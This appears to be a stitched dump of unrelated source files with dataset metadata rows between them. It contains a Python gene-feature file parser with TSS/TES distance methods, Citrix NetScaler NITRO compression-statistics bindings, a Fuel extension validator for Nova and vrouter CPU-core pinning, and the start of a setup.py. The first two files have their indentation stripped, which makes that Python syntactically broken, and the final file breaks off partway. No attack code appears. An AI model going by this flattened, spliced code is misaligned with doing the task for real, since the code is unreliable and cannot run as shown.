line_index += 1
# Skip lines starting with #
if line.startswith('#'):
logging.debug("Feature file: skipped line: %s" %
line.strip())
continue
# Lines are tab-delimited and have at least 5 columns:
# ID chr start end strand
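                # An example of a well-formed, tab-delimited record
                # (values are made up):
                #   GENE0001    chr1    1000    2000    +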
items = line.strip().split('\t')
if len(items) < 5:
logging.warning("Feature file: skipped line: %s" %
line.strip())
logging.warning("Insufficient number of fields (%d)" %
len(items))
continue
# Check line is valid i.e. start and stop should be
# numbers, strand should be + or -
problem_fields = []
if not items[2].isdigit():
problem_fields.append(2)
if not items[3].isdigit():
problem_fields.append(3)
if not (items[4] == '+' or items[4] == '-'):
problem_fields.append(4)
if problem_fields:
# If this is the first line then assume it's a header
# and ignore
if line_index == 1:
logging.warning("%s: first line ignored as header: "
"%s" % (features_file,line.strip()))
else:
# Indicate problem field(s)
logging.error("%s: critical error line %d: bad "
"values:" % (features_file,line_index))
logging.error("%s" % line.strip())
logging.error("%s" % make_errline(line.strip(),
problem_fields))
# This is a critical error: update flag
critical_error = True
# Continue to next line
continue
elif int(items[2]) >= int(items[3]):
# Start position is same or higher than end
logging.error("%s: critical error line %d: 'end' comes "
"before 'start':" % (features_file,
line_index))
logging.error("%s" % line.strip())
logging.error("%s" % make_errline(line.strip(),(2,3)))
# This is a critical error: update flag but continue
# reading
critical_error = True
continue
# Store in a new Feature object
feature = Feature(items[0],
items[1],
items[2],
items[3],
items[4],
source_file=features_file)
# Additional flag
if len(items) >= 6:
# Is column 6 a flag?
try:
flag_value = int(items[5])
if flag_value != 0 and flag_value != 1:
flag_value = None
except ValueError:
flag_value = None
# Store value
feature.flag = flag_value
# Store data
self.features.append(feature)
# Deal with postponed critical errors
if critical_error:
raise Exception("Critical error(s) in '%s'" % features_file)
# Store the source file
self.source_file = features_file
# Return a reference to this object
return self
def addFeature(self,feature):
"""Append a feature to the FeatureSet object
Arguments:
feature: a Feature instance.
"""
self.features.append(feature)
def filterByChr(self,matchChr):
"""Return a subset of features filtered by specified chromosome name
Returns a new FeatureSet object containing only the data from
the current object which matches the specified criteria.
"""
# Make a new (empty) FeatureSet object
feature_subset = FeatureSet()
# Populate with only the matching features
for feature in self.features:
if feature.chrom == matchChr:
feature_subset.addFeature(feature)
return feature_subset
def filterByStrand(self,matchStrand):
"""Return a subset of features filtered by specified strand
Returns a new FeatureSet object containing only the data from
the current object which matches the specified criteria.
"""
# Make a new (empty) FeatureSet object
feature_subset = FeatureSet()
# Populate with only the matching features
for feature in self.features:
if feature.strand == matchStrand:
feature_subset.addFeature(feature)
return feature_subset
def filterByFlag(self,matchFlag):
"""Return a subset of features filtered by flag value
Returns a new FeatureSet object containing only the features from
the current object which matches the specified criteria.
Note that if there is no flag (the "isFlagged()" function returns
False) then an empty set will be returned.
"""
        # Make a new (empty) FeatureSet object
feature_subset = FeatureSet()
# Populate with only the matching features
for feature in self.features:
if feature.flag == matchFlag:
feature_subset.addFeature(feature)
return feature_subset
def filterByTSS(self,limit1,limit2,exclude_limits=False):
"""Return a subset of features filtered by TSS position
Returns a new FeatureSet object containing only the features
from the current object where the TSS positions fall within a
region defined by upper and lower limits.
limits can be supplied in either order (i.e. highest/lowest
or lowest/highest).
If exclude_limits is False (the default) then TSS positions
that fall exactly on one of the boundaries are counted as
being within the region; if it is True then these TSS
positions will not be considered to lie inside the region.
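        For example (illustrative values), filterByTSS(20000,10000)
        returns the features whose TSS lies in the closed interval
        [10000,20000].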
"""
# Sort out upper and lower limits
if limit1 > limit2:
upper,lower = limit1,limit2
else:
upper,lower = limit2,limit1
# Make a new (empty) FeatureSet object
feature_subset = FeatureSet()
# Populate with only the matching features
for feature in self.features:
TSS = feature.getTSS()
if exclude_limits:
if lower < TSS and TSS < upper:
feature_subset.addFeature(feature)
else:
if lower <= TSS and TSS <= upper:
feature_subset.addFeature(feature)
return feature_subset
def sortByDistanceFrom(self,position):
"""Sort the features into order based on distance from a position
Sorts the features into order of absolute distance of
their TSS to the specified position (closest first).
Note that this operates on the current object.
"""
self.features = sorted(self.features,
key=lambda record:
abs(record.getTSS()-position))
return self
def sortByClosestEdgeTo(self,position1,position2=None):
"""Sort the features into order based on closest edge (TSS or TES)
Sorts the features into order of smallest absolute distance
to the specified position (closest first), considering both TSS
and TES, using the getClosestEdgeDistanceTo method of the
Feature class.
Note that this operates on the current object.
"""
self.features = sorted(self.features,
key=lambda record:
record.getClosestEdgeDistanceTo(position1,
position2))
return self
def sortByClosestTSSTo(self,position1,position2=None):
"""Sort the features into order based on closest edge to TSS
        Sorts the features into order of smallest absolute distance
        from their TSS to the specified position(s) (closest first),
using the getClosestTSSDistanceTo method of the Feature class.
Note that this operates on the current object.
"""
self.features = sorted(self.features,
key=lambda record:
record.getClosestTSSDistanceTo(position1,
position2))
return self
def isFlagged(self):
"""Check whether feature data includes flags
Checks whether all the Feature records also have a valid flag
associated with them - if yes then returns True (indicating the
dataset as a whole is flagged), otherwise returns False.
"""
# Check all data and look for any None flags
for feature in self.features:
if feature.flag is None:
return False
# All flags valid
return True
def __iter__(self):
return iter(self.features)
def __getitem__(self,key):
try:
start = key.start
stop = key.stop
step = key.step
slice_ = FeatureSet()
for feature in self.features[start:stop:step]:
slice_.addFeature(feature)
return slice_
except AttributeError:
return self.features[key]
def __len__(self):
return len(self.features)
def __eq__(self,other):
if len(self) != len(other):
return False
for f1,f2 in zip(self,other):
if f1 != f2:
return False
return True
def __ne__(self,other):
if len(self) != len(other):
return True
for f1,f2 in zip(self,other):
if f1 != f2:
return True
return False
class Feature(object):
"""Class for storing an 'feature' (gene/transcript/isomer)
Access the data for the feature using the object's properties:
id
chrom
start
end
strand
tss
tes
A feature can also have the following optional data
associated with it:
- A source file name, which is set via the 'source_file'
keyword and accessed via the 'source_file' property.
It will be None if no filename has been specified.
There are also convenience methods (getTSS, getTES, getPromoterRegion)
and methods for calculating various distances.
"""
def __init__(self,feature_id,chrom,start,end,strand,source_file=None):
self.id = feature_id
self.chrom = chrom
self.start = int(start)
self.end = int(end)
self.strand = strand
self.flag = None
self.source_file = source_file
# Set the TSS and TES
if self.strand == '+':
self.tss = self.start
self.tes = self.end
elif self.strand == '-':
self.tss = self.end
self.tes = self.start
else:
raise Exception("Bad strand: '%s'" % self.strand)
def __repr__(self):
items = [self.id,
self.chrom,
str(self.start),
str(self.end),
self.strand]
if self.flag != None:
items.append(str(self.flag))
return '\t'.join(items)
def __eq__(self,other):
return \
(self.id == other.id) and \
(self.strand == other.strand) and \
(self.start == other.start) and \
(self.end == other.end)
def __ne__(self,other):
return \
(self.id != other.id) or \
(self.strand != other.strand) or \
(self.start != other.start) or \
(self.end != other.end)
def getTSS(self):
"""Return the TSS coordinate
        TSS (transcription start site) is the start position for a +ve
strand, or end for a -ve strand.
This is a wrapper for accessing the 'tss' property.
"""
return self.tss
def getTES(self):
"""Return the TES coordinate
        TES (transcription end site) is the end position for a +ve
        strand, or the start position for a -ve strand.
This is a wrapper for accessing the 'tes' property.
"""
return self.tes
def containsPosition(self,coordinate):
"""Check whether a coordinate is within the gene coordinates
Returns True if coordinate lies within start and end, False
otherwise.
"""
return (self.start <= coordinate and coordinate <= self.end)
def getClosestTSSDistanceTo(self,position1,position2=None,
zero_inside_region=False):
"""Return distance from TSS to a coordinate or region
For a single specified position, return the absolute distance
between the position and the TSS.
If a second position is given (specifying a region) then return
smallest absolute distance of (TSS,position1) and (TSS,position2).
By default there is no special treatment when the TSS lies inside
the region specified by two positions; to return zero distance in
these cases, set the 'zero_inside_region' argument to True.
"""
return closestDistanceToRegion(self.getTSS(),
position1,position2,
zero_inside_region)
def getClosestTESDistanceTo(self,position1,position2=None,
zero_inside_region=False):
"""Return distance from TES to a coordinate or region
For a single specified position, return the absolute distance
between the position and the TES.
If a second position is given (specifying a region) then return
smallest absolute distance of (TES,position1) and (TES,position2).
By default there is no special treatment when the TES lies inside
the region specified by two positions; to return zero distance in
these cases, set the 'zero_inside_region' argument to True.
"""
return closestDistanceToRegion(self.getTES(),
position1,position2,
zero_inside_region)
def getClosestEdgeDistanceTo(self,position1,position2=None,
zero_inside_region=False):
"""Return closest edge distance to a coordinate or region
For a single specified position, the closest edge is whichever
of the TSS or TES is nearest (smallest absolute distance) from
that position i.e. the smallest distance of (TSS,position) and
(TES,position).
If a second position is given (specifying a region) then
the closest edge is whichever of the TSS/TES is closest to
either position1 or position2 i.e. the smallest distance of
(TSS,position1), (TES,position1), (TSS,position2) and
(TES,position2).
By default there is no special treatment when either the TSS
or TES lie inside the region specified by two positions; to
set this to zero, set the 'zero_inside_region' argument to
True.
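        As an illustration (made-up coordinates): for a feature with
        TSS=100 and TES=500, getClosestEdgeDistanceTo(120) returns
        min(|100-120|, |500-120|) = 20.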
"""
return min(self.getClosestTSSDistanceTo(position1,
position2,
zero_inside_region),
self.getClosestTESDistanceTo(position1,
position2,
zero_inside_region))
def getPromoterRegion(self,to_TSS,from_TSS):
"""Return the coordinates of the promoter region
The promoter region is a region of coordinates around the
TSS of a gene, defined by the supplied distances 'to_TSS'
        (the distance upstream from the TSS) and 'from_TSS' (the
        distance downstream from the TSS).
Returns a tuple containing the start and end coordinates
defining the promoter region.
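        For example (made-up values): a '+' strand feature with TSS at
        1000 and to_TSS=200, from_TSS=50 yields the region (800, 1050).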
"""
if self.strand == '+':
return (self.getTSS() - to_TSS,
self.getTSS() + from_TSS)
else:
return (self.getTSS() + to_TSS,
self.getTSS() - from_TSS)
|
artistic-2.0
| -4,439,065,279,214,473,700
| 36.087719
| 77
| 0.553716
| false
| 4.833841
| false
| false
| false
|
mahabs/nitro
|
nssrc/com/citrix/netscaler/nitro/resource/stat/cmp/cmp_stats.py
|
1
|
23212
|
#
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class cmp_stats(base_resource) :
def __init__(self) :
self._clearstats = ""
self._delbwsaving = 0
self._delcmpratio = 0
self._decomptcpratio = 0
self._decomptcpbandwidthsaving = 0
self._comptcpratio = 0
self._comptcpbandwidthsaving = 0
self._comptotaldatacompressionratio = 0
self._comphttpbandwidthsaving = 0
self._compratio = 0
self._comptotalrequests = 0
self._comprequestsrate = 0
self._comptotalrxbytes = 0
self._comprxbytesrate = 0
self._comptotaltxbytes = 0
self._comptxbytesrate = 0
self._comptotalrxpackets = 0
self._comprxpacketsrate = 0
self._comptotaltxpackets = 0
self._comptxpacketsrate = 0
self._comptcptotalrxbytes = 0
self._comptcprxbytesrate = 0
self._comptcptotalrxpackets = 0
self._comptcprxpacketsrate = 0
self._comptcptotaltxbytes = 0
self._comptcptxbytesrate = 0
self._comptcptotaltxpackets = 0
self._comptcptxpacketsrate = 0
self._comptcptotalquantum = 0
self._comptcpquantumrate = 0
self._comptcptotalpush = 0
self._comptcppushrate = 0
self._comptcptotaleoi = 0
self._comptcpeoirate = 0
self._comptcptotaltimer = 0
self._comptcptimerrate = 0
self._decomptcprxbytes = 0
self._decomptcprxbytesrate = 0
self._decomptcprxpackets = 0
self._decomptcprxpacketsrate = 0
self._decomptcptxbytes = 0
self._decomptcptxbytesrate = 0
self._decomptcptxpackets = 0
self._decomptcptxpacketsrate = 0
self._decomptcperrdata = 0
self._decomptcperrdatarate = 0
self._decomptcperrlessdata = 0
self._decomptcperrlessdatarate = 0
self._decomptcperrmoredata = 0
self._decomptcperrmoredatarate = 0
self._decomptcperrmemory = 0
self._decomptcperrmemoryrate = 0
self._decomptcperrunknown = 0
self._decomptcperrunknownrate = 0
self._delcomptotalrequests = 0
self._delcomprequestsrate = 0
self._delcompdone = 0
self._delcompdonerate = 0
self._delcomptcprxbytes = 0
self._delcomptcprxbytesrate = 0
self._delcomptcptxbytes = 0
self._delcomptcptxbytesrate = 0
self._delcompfirstaccess = 0
self._delcompfirstaccessrate = 0
self._delcomptcprxpackets = 0
self._delcomptcprxpacketsrate = 0
self._delcomptcptxpackets = 0
self._delcomptcptxpacketsrate = 0
self._delcompbaseserved = 0
self._delcompbaseservedrate = 0
self._delcompbasetcptxbytes = 0
self._delcompbasetcptxbytesrate = 0
self._delcomperrbypassed = 0
self._delcomperrbypassedrate = 0
self._delcomperrbfilewhdrfailed = 0
self._delcomperrbfilewhdrfailedrate = 0
self._delcomperrnostoremiss = 0
self._delcomperrnostoremissrate = 0
self._delcomperrreqinfotoobig = 0
self._delcomperrreqinfotoobigrate = 0
self._delcomperrreqinfoallocfail = 0
self._delcomperrreqinfoallocfailrate = 0
self._delcomperrsessallocfail = 0
self._delcomperrsessallocfailrate = 0
@property
def clearstats(self) :
"""Clear the statsistics / counters.<br/>Possible values = basic, full.
"""
try :
return self._clearstats
except Exception as e:
raise e
@clearstats.setter
def clearstats(self, clearstats) :
"""Clear the statsistics / counters
"""
try :
self._clearstats = clearstats
except Exception as e:
raise e
@property
def delcompbasetcptxbytes(self) :
"""Number of basefile bytes transmitted by NetScaler.
"""
try :
return self._delcompbasetcptxbytes
except Exception as e:
raise e
@property
def comphttpbandwidthsaving(self) :
"""Bandwidth saving from TCP compression expressed as percentage.
"""
try :
return self._comphttpbandwidthsaving
except Exception as e:
raise e
@property
def comptcptotalpush(self) :
"""Number of times the NetScaler compresses data on receiving a TCP PUSH flag from the server. The PUSH flag ensures that data is compressed immediately without waiting for the buffered data size to reach the quantum size.
"""
try :
return self._comptcptotalpush
except Exception as e:
raise e
@property
def delcompfirstaccess(self) :
"""Total number of delta compression first accesses.
"""
try :
return self._delcompfirstaccess
except Exception as e:
raise e
@property
def delcompdone(self) :
"""Total number of delta compressions done by NetScaler.
"""
try :
return self._delcompdone
except Exception as e:
raise e
@property
def comptcptotalrxpackets(self) :
"""Total number of compressible packets received by NetScaler.
"""
try :
return self._comptcptotalrxpackets
except Exception as e:
raise e
@property
def delcomperrbypassed(self) :
"""Number of times delta-compression bypassed by NetScaler.
"""
try :
return self._delcomperrbypassed
except Exception as e:
raise e
@property
def decomptcptxpacketsrate(self) :
"""Rate (/s) counter for decomptcptxpackets.
"""
try :
return self._decomptcptxpacketsrate
except Exception as e:
raise e
@property
def delcompbasetcptxbytesrate(self) :
"""Rate (/s) counter for delcompbasetcptxbytes.
"""
try :
return self._delcompbasetcptxbytesrate
except Exception as e:
raise e
@property
def delbwsaving(self) :
"""Bandwidth saving from delta compression expressed as percentage.
"""
try :
return self._delbwsaving
except Exception as e:
raise e
@property
def comprequestsrate(self) :
"""Rate (/s) counter for comptotalrequests.
"""
try :
return self._comprequestsrate
except Exception as e:
raise e
@property
def comptotaltxbytes(self) :
"""Number of bytes the NetScaler sends to the client after compressing the response from the server.
"""
try :
return self._comptotaltxbytes
except Exception as e:
raise e
@property
def comptcpeoirate(self) :
"""Rate (/s) counter for comptcptotaleoi.
"""
try :
return self._comptcpeoirate
except Exception as e:
raise e
@property
def delcomptcptxbytes(self) :
"""Total number of delta-compressed bytes transmitted by NetScaler.
"""
try :
return self._delcomptcptxbytes
except Exception as e:
raise e
@property
def delcomperrreqinfoallocfail(self) :
"""Number of times requested basefile could not be allocated.
"""
try :
return self._delcomperrreqinfoallocfail
except Exception as e:
raise e
@property
def delcomperrbypassedrate(self) :
"""Rate (/s) counter for delcomperrbypassed.
"""
try :
return self._delcomperrbypassedrate
except Exception as e:
raise e
@property
def delcmpratio(self) :
"""Ratio of compressible data received to compressed data transmitted.If this ratio is one (uncmp:1.0) that means compression is disabled or we are not able to compress even a single compressible packet.
"""
try :
return self._delcmpratio
except Exception as e:
raise e
@property
def delcomprequestsrate(self) :
"""Rate (/s) counter for delcomptotalrequests.
"""
try :
return self._delcomprequestsrate
except Exception as e:
raise e
@property
def delcomperrreqinfotoobig(self) :
"""Number of times basefile request URL was too large.
"""
try :
return self._delcomperrreqinfotoobig
except Exception as e:
raise e
@property
def delcomptcprxpacketsrate(self) :
"""Rate (/s) counter for delcomptcprxpackets.
"""
try :
return self._delcomptcprxpacketsrate
except Exception as e:
raise e
@property
def decomptcperrmemory(self) :
"""Number of times memory failures occurred while decompressing.
"""
try :
return self._decomptcperrmemory
except Exception as e:
raise e
@property
def decomptcprxbytes(self) :
"""Total number of compressed bytes received by NetScaler.
"""
try :
return self._decomptcprxbytes
except Exception as e:
raise e
@property
def comptcptxpacketsrate(self) :
"""Rate (/s) counter for comptcptotaltxpackets.
"""
try :
return self._comptcptxpacketsrate
except Exception as e:
raise e
@property
def comptotaldatacompressionratio(self) :
"""Ratio of total HTTP data received to total HTTP data transmitted.
"""
try :
return self._comptotaldatacompressionratio
except Exception as e:
raise e
@property
def comprxbytesrate(self) :
"""Rate (/s) counter for comptotalrxbytes.
"""
try :
return self._comprxbytesrate
except Exception as e:
raise e
@property
def delcomperrsessallocfailrate(self) :
"""Rate (/s) counter for delcomperrsessallocfail.
"""
try :
return self._delcomperrsessallocfailrate
except Exception as e:
raise e
@property
def delcomptcptxpacketsrate(self) :
"""Rate (/s) counter for delcomptcptxpackets.
"""
try :
return self._delcomptcptxpacketsrate
except Exception as e:
raise e
@property
def comptcptotaleoi(self) :
"""Number of times the NetScaler compresses data on receiving End Of Input (FIN packet). When the NetScaler receives End Of Input (FIN packet), it compresses the buffered data immediately without waiting for the buffered data size to reach the quantum size.
"""
try :
return self._comptcptotaleoi
except Exception as e:
raise e
@property
def comptcppushrate(self) :
"""Rate (/s) counter for comptcptotalpush.
"""
try :
return self._comptcppushrate
except Exception as e:
raise e
@property
def decomptcperrmemoryrate(self) :
"""Rate (/s) counter for decomptcperrmemory.
"""
try :
return self._decomptcperrmemoryrate
except Exception as e:
raise e
@property
def decomptcperrunknownrate(self) :
"""Rate (/s) counter for decomptcperrunknown.
"""
try :
return self._decomptcperrunknownrate
except Exception as e:
raise e
@property
def comptcpbandwidthsaving(self) :
"""Bandwidth saving from TCP compression expressed as percentage.
"""
try :
return self._comptcpbandwidthsaving
except Exception as e:
raise e
@property
def decomptcperrmoredata(self) :
"""Number of times NetScaler received more data than declared by protocol.
"""
try :
return self._decomptcperrmoredata
except Exception as e:
raise e
@property
def delcompfirstaccessrate(self) :
"""Rate (/s) counter for delcompfirstaccess.
"""
try :
return self._delcompfirstaccessrate
except Exception as e:
raise e
@property
def comprxpacketsrate(self) :
"""Rate (/s) counter for comptotalrxpackets.
"""
try :
return self._comprxpacketsrate
except Exception as e:
raise e
@property
def comptotalrxbytes(self) :
"""Number of bytes that can be compressed, which the NetScaler receives from the server. This gives the content length of the response that the NetScaler receives from server.
"""
try :
return self._comptotalrxbytes
except Exception as e:
raise e
@property
def decomptcprxpacketsrate(self) :
"""Rate (/s) counter for decomptcprxpackets.
"""
try :
return self._decomptcprxpacketsrate
except Exception as e:
raise e
@property
def comptcpquantumrate(self) :
"""Rate (/s) counter for comptcptotalquantum.
"""
try :
return self._comptcpquantumrate
except Exception as e:
raise e
@property
def comptxbytesrate(self) :
"""Rate (/s) counter for comptotaltxbytes.
"""
try :
return self._comptxbytesrate
except Exception as e:
raise e
@property
def delcompbaseservedrate(self) :
"""Rate (/s) counter for delcompbaseserved.
"""
try :
return self._delcompbaseservedrate
except Exception as e:
raise e
@property
def decomptcptxbytes(self) :
"""Total number of decompressed bytes transmitted by NetScaler.
"""
try :
return self._decomptcptxbytes
except Exception as e:
raise e
@property
def comptcptxbytesrate(self) :
"""Rate (/s) counter for comptcptotaltxbytes.
"""
try :
return self._comptcptxbytesrate
except Exception as e:
raise e
@property
def delcomptcprxpackets(self) :
"""Number of delta-compressible packets received.
"""
try :
return self._delcomptcprxpackets
except Exception as e:
raise e
@property
def decomptcprxpackets(self) :
"""Total number of compressed packets received by NetScaler.
"""
try :
return self._decomptcprxpackets
except Exception as e:
raise e
@property
def comptcptotaltimer(self) :
"""Number of times the NetScaler compresses data on expiration of data accumulation timer. The timer expires if the server response is very slow and consequently, the NetScaler does not receive response for a certain amount of time. Under such a condition, the NetScaler compresses the buffered data immediately without waiting for the buffered data size to reach the quantum size.
"""
try :
return self._comptcptotaltimer
except Exception as e:
raise e
@property
def delcomperrnostoremissrate(self) :
"""Rate (/s) counter for delcomperrnostoremiss.
"""
try :
return self._delcomperrnostoremissrate
except Exception as e:
raise e
@property
def delcomperrbfilewhdrfailed(self) :
"""Number of times basefile could not be updated in NetScaler cache.
"""
try :
return self._delcomperrbfilewhdrfailed
except Exception as e:
raise e
@property
def decomptcperrmoredatarate(self) :
"""Rate (/s) counter for decomptcperrmoredata.
"""
try :
return self._decomptcperrmoredatarate
except Exception as e:
raise e
@property
def decomptcpbandwidthsaving(self) :
"""Bandwidth saving from TCP compression expressed as percentage.
"""
try :
return self._decomptcpbandwidthsaving
except Exception as e:
raise e
@property
def delcomperrsessallocfail(self) :
"""Number of times delta compression session could not be allocated.
"""
try :
return self._delcomperrsessallocfail
except Exception as e:
raise e
@property
def delcompbaseserved(self) :
"""Total number of basefile requests served by NetScaler.
"""
try :
return self._delcompbaseserved
except Exception as e:
raise e
@property
def compratio(self) :
"""Ratio of the compressible data received from the server to the compressed data sent to the client.
"""
try :
return self._compratio
except Exception as e:
raise e
@property
def decomptcptxbytesrate(self) :
"""Rate (/s) counter for decomptcptxbytes.
"""
try :
return self._decomptcptxbytesrate
except Exception as e:
raise e
@property
def decomptcperrlessdata(self) :
"""Number of times NetScaler received less data than declared by protocol.
"""
try :
return self._decomptcperrlessdata
except Exception as e:
raise e
@property
def comptcprxbytesrate(self) :
"""Rate (/s) counter for comptcptotalrxbytes.
"""
try :
return self._comptcprxbytesrate
except Exception as e:
raise e
@property
def comptxpacketsrate(self) :
"""Rate (/s) counter for comptotaltxpackets.
"""
try :
return self._comptxpacketsrate
except Exception as e:
raise e
@property
def comptcprxpacketsrate(self) :
"""Rate (/s) counter for comptcptotalrxpackets.
"""
try :
return self._comptcprxpacketsrate
except Exception as e:
raise e
@property
def comptotaltxpackets(self) :
"""Number of HTTP packets that the NetScaler sends to the client after compressing the response from the server.
"""
try :
return self._comptotaltxpackets
except Exception as e:
raise e
@property
def delcomptcptxbytesrate(self) :
"""Rate (/s) counter for delcomptcptxbytes.
"""
try :
return self._delcomptcptxbytesrate
except Exception as e:
raise e
@property
def delcomperrreqinfotoobigrate(self) :
"""Rate (/s) counter for delcomperrreqinfotoobig.
"""
try :
return self._delcomperrreqinfotoobigrate
except Exception as e:
raise e
@property
def decomptcprxbytesrate(self) :
"""Rate (/s) counter for decomptcprxbytes.
"""
try :
return self._decomptcprxbytesrate
except Exception as e:
raise e
@property
def decomptcperrdatarate(self) :
"""Rate (/s) counter for decomptcperrdata.
"""
try :
return self._decomptcperrdatarate
except Exception as e:
raise e
@property
def comptotalrequests(self) :
"""Number of HTTP compression requests the NetScaler receives for which the response is successfully compressed. For example, after you enable compression and configure services, if you send requests to the NetScaler with the following header information: "Accept-Encoding: gzip, deflate", and NetScaler compresses the corresponding response, this counter is incremented.
"""
try :
return self._comptotalrequests
except Exception as e:
raise e
@property
def decomptcperrunknown(self) :
"""Number of times unknown errors occurred while decompressing.
"""
try :
return self._decomptcperrunknown
except Exception as e:
raise e
@property
def comptotalrxpackets(self) :
"""Number of HTTP packets that can be compressed, which the NetScaler receives from the server.
"""
try :
return self._comptotalrxpackets
except Exception as e:
raise e
@property
def delcomptcprxbytes(self) :
"""Total number of delta-compressible bytes received by NetScaler.
"""
try :
return self._delcomptcprxbytes
except Exception as e:
raise e
@property
def comptcptimerrate(self) :
"""Rate (/s) counter for comptcptotaltimer.
"""
try :
return self._comptcptimerrate
except Exception as e:
raise e
@property
def comptcptotalquantum(self) :
"""Number of times the NetScaler compresses a quantum of data. NetScaler buffers the data received from the server till it reaches the quantum size and then compresses the buffered data and transmits to the client.
"""
try :
return self._comptcptotalquantum
except Exception as e:
raise e
@property
def comptcptotaltxpackets(self) :
"""Number of TCP packets that the NetScaler sends to the client after compressing the response from the server.
"""
try :
return self._comptcptotaltxpackets
except Exception as e:
raise e
@property
def delcompdonerate(self) :
"""Rate (/s) counter for delcompdone.
"""
try :
return self._delcompdonerate
except Exception as e:
raise e
@property
def delcomptcptxpackets(self) :
"""Total number of delta-compressed packets transmitted by NetScaler.
"""
try :
return self._delcomptcptxpackets
except Exception as e:
raise e
@property
def decomptcpratio(self) :
"""Ratio of decompressed data transmitted to compressed data received.
"""
try :
return self._decomptcpratio
except Exception as e:
raise e
@property
def decomptcperrlessdatarate(self) :
"""Rate (/s) counter for decomptcperrlessdata.
"""
try :
return self._decomptcperrlessdatarate
except Exception as e:
raise e
@property
def comptcptotalrxbytes(self) :
"""Number of bytes that can be compressed, which the NetScaler receives from the server. This gives the content length of the response that the NetScaler receives from server.
"""
try :
return self._comptcptotalrxbytes
except Exception as e:
raise e
@property
def delcomptcprxbytesrate(self) :
"""Rate (/s) counter for delcomptcprxbytes.
"""
try :
return self._delcomptcprxbytesrate
except Exception as e:
raise e
@property
def comptcptotaltxbytes(self) :
"""Number of bytes that the NetScaler sends to the client after compressing the response from the server.
"""
try :
return self._comptcptotaltxbytes
except Exception as e:
raise e
@property
def decomptcptxpackets(self) :
"""Total number of decompressed packets transmitted by NetScaler.
"""
try :
return self._decomptcptxpackets
except Exception as e:
raise e
@property
def delcomptotalrequests(self) :
"""Total number of delta compression requests received by NetScaler.
"""
try :
return self._delcomptotalrequests
except Exception as e:
raise e
@property
def delcomperrreqinfoallocfailrate(self) :
"""Rate (/s) counter for delcomperrreqinfoallocfail.
"""
try :
return self._delcomperrreqinfoallocfailrate
except Exception as e:
raise e
@property
def delcomperrbfilewhdrfailedrate(self) :
"""Rate (/s) counter for delcomperrbfilewhdrfailed.
"""
try :
return self._delcomperrbfilewhdrfailedrate
except Exception as e:
raise e
@property
def delcomperrnostoremiss(self) :
"""Number of times basefile was not found in NetScaler cache.
"""
try :
return self._delcomperrnostoremiss
except Exception as e:
raise e
@property
def comptcpratio(self) :
"""Ratio of compressible data received to compressed data transmitted.If this ratio is one (uncmp:1.0) that means compression is disabled or we are not able to compress even a single compressible packet.
"""
try :
return self._comptcpratio
except Exception as e:
raise e
@property
def decomptcperrdata(self) :
"""Number of data errors encountered while decompressing.
"""
try :
return self._decomptcperrdata
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(cmp_response, response, self.__class__.__name__.replace('_stats',''))
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.cmp
except Exception as e :
raise e
def _get_object_name(self) :
""" Returns the value of object identifier argument
"""
try :
return None
except Exception as e :
raise e
@classmethod
def get(cls, service, name="", option_="") :
""" Use this API to fetch the statistics of all cmp_stats resources that are configured on netscaler.
"""
try :
obj = cmp_stats()
if not name :
response = obj.stat_resources(service, option_)
return response
except Exception as e:
raise e
class Clearstats:
basic = "basic"
full = "full"
class cmp_response(base_response) :
def __init__(self, length=1) :
self.cmp = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.cmp = [cmp_stats() for _ in range(length)]
|
apache-2.0
| 1,323,930,941,714,670,600
| 24.039914
| 384
| 0.721006
| false
| 3.227475
| false
| false
| false
|
pbasov/fuel-extension-cpu-pinning
|
fuel_extension_cpu_pinning/validators.py
|
1
|
1623
|
from fuel_extension_cpu_pinning.models import CpuPinOverride
from nailgun.api.v1.validators.base import BasicValidator
from nailgun.errors import errors
from nailgun.logger import logger
class CpuPinningValidator(BasicValidator):
schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"title": "CPU pinning for Nova and Contrail vrouter",
"description": "CPU cores masks",
"type": "object",
"properties": {
"nova_cores": {"type": "array"},
"vrouter_cores": {"type": "array"},
},
}
@classmethod
def validate(cls, data, node=None, pins_data=None):
"""Check input data for intersections
to ensure correct core bindings
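        For example (hypothetical masks), nova_cores=[0, 1] and
        vrouter_cores=[1, 2] overlap on core 1, so validation raises
        InvalidData.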
"""
dict_data = cls.validate_json(data)
cls.validate_schema(dict_data, cls.schema)
api_nova_cores = dict_data.get('nova_cores', [])
api_vrouter_cores = dict_data.get('vrouter_cores', [])
db_nova_cores = pins_data.get('nova_cores') or []
db_vrouter_cores = pins_data.get('vrouter_cores') or []
if set(api_nova_cores) & set(api_vrouter_cores) != set():
raise errors.InvalidData('Input values conflict with each other')
if all(cores != [] for cores in (api_nova_cores, api_vrouter_cores)):
return dict_data
if any(condition != set() for condition in [
set(api_nova_cores) & set(db_vrouter_cores),
set(api_vrouter_cores) & set(db_nova_cores)]
):
            raise errors.InvalidData('Input values conflict with existing ones')
return dict_data
|
apache-2.0
| 5,613,233,836,513,574,000
| 36.744186
| 79
| 0.610598
| false
| 3.731034
| false
| false
| false
|
akvo/butler
|
setup.py
|
1
|
2525
|
# -*- coding: UTF-8 -*-
from distutils.command.install import INSTALL_SCHEMES
from distutils.core import setup
from setuptools import find_packages
import os
import re
import time
_version = "0.1.%sdev0" % int(time.time())
_packages = find_packages('butler', exclude=["*.tests", "*.tests.*", "tests.*", "tests"])
# make sure that data files go into the right place
